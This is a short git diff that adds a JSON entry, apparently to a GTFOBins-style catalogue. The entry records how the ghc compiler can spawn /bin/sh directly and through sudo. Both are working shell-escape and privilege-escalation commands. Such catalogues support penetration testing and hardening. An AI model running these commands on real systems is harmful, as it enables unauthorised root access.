diff --git a/data/ghc.json b/data/ghc.json new file mode 100644 index 0000000..98959eb --- /dev/null +++ b/data/ghc.json @@ -0,0 +1,14 @@ +{ + "functions": { + "shell": [ + { + "code": "ghc -e 'System.Process.callCommand \"/bin/sh\"'" + } + ], + "sudo": [ + { + "code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'" + } + ] + } +}